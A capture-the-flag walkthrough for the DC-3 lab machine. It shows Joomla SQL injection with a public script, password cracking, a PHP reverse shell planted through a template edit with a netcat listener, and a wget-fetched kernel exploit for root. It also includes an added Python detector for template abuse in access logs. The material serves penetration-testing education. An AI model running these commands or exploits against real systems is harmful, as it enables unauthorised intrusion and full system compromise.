CTF: DC-3 Walkthrough


Hello dear friends, welcome back for another CTF walkthrough. Today we will solve the DC-3 machine.

Description

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Technical Information

DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.

Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple – download it, unzip it, and then import it into VirtualBox and away you go.

Important

While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn’t be any problems, but I feel the need to throw this out there just in case.

Information gathering

TCP Scanning

The only service exposed is HTTP.

Nikto

The scan detected that the web server is running the Joomla CMS.

Joomscan

Joomla version 3.7.0 has a SQL injection vulnerability. We will use this exploit:

  • https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
  • ./joomblah.py http://192.168.1.165

Fantastic, we got the username and the password hash.

John the Ripper

The next step is to crack the password hash. To do that, we will use the tool john:

  • john hash.txt
  • admin:snoopy

Fantastic, we cracked the password.

Reverse shell

At this point, we need to access the web server. After logging in to the admin page (http://192.168.1.165/administrator/index.php), we have to install a reverse shell (/usr/share/webshells/php/php-reverse-shell.php). To do that, we will modify a template page:

  • Open a new terminal and put netcat into listening mode: nc -nlvp 443
  • Then navigate to http://192.168.1.165/templates/protostar

Great, we got a shell.
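From the defender's side, both the template edit and the direct request to the template directory leave traces in the web server's access log. The following is an added example, not part of the original walkthrough: it flags clients that save a template in the admin panel and then request a non-static path under /templates/. It assumes Apache combined log format and that a template save is a POST to /administrator/index.php with option=com_templates; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined format), not taken from the page.
SAMPLE_LOG = """\
192.168.1.50 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 7421 "-" "Mozilla/5.0"
192.168.1.50 - - [01/Jan/2024:10:00:02 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Jan/2024:10:05:10 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Jan/2024:10:06:30 +0000] "POST /administrator/index.php?option=com_templates&view=template&id=1 HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Jan/2024:10:07:02 +0000] "GET /templates/protostar/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.60 - - [01/Jan/2024:10:09:44 +0000] "GET /templates/protostar/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
STATIC_RE = re.compile(r'\.(css|js|png|jpe?g|gif|svg|ico|woff2?|ttf|map)$', re.I)

def parse(log_text):
    """Yield (ip, timestamp, method, url, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), m.group(4), int(m.group(5))

def find_template_abuse(log_text):
    """Return alerts for successful non-static requests under /templates/.
    Severity is 'high' when the same client saved a template earlier."""
    editors, alerts = set(), []
    for ip, ts, method, url, status in parse(log_text):
        parts = urlsplit(url)
        option = parse_qs(parts.query).get("option", [""])[0]
        if (method == "POST" and parts.path == "/administrator/index.php"
                and option == "com_templates"):
            editors.add(ip)  # template source was written from this client
        elif (parts.path.startswith("/templates/")
                and not STATIC_RE.search(parts.path) and status < 400):
            severity = "high" if ip in editors else "review"
            alerts.append((severity, ip, ts, parts.path))
    return alerts

if __name__ == "__main__":
    for alert in find_template_abuse(SAMPLE_LOG):
        print(alert)
```

Joomla normally serves template PHP through the site's index.php, so a direct hit on a template's PHP file or directory is worth reviewing even without a preceding edit.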

Privilege Escalation

The final step is to escalate our privileges.

uname -a

Fantastic, the kernel version is vulnerable. We will use this exploit:

  • https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
  • cd /tmp
  • wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
  • unzip 39772.zip
  • bash compile.sh
  • ./doubleput

Fantastic, we have completed the DC-3 machine.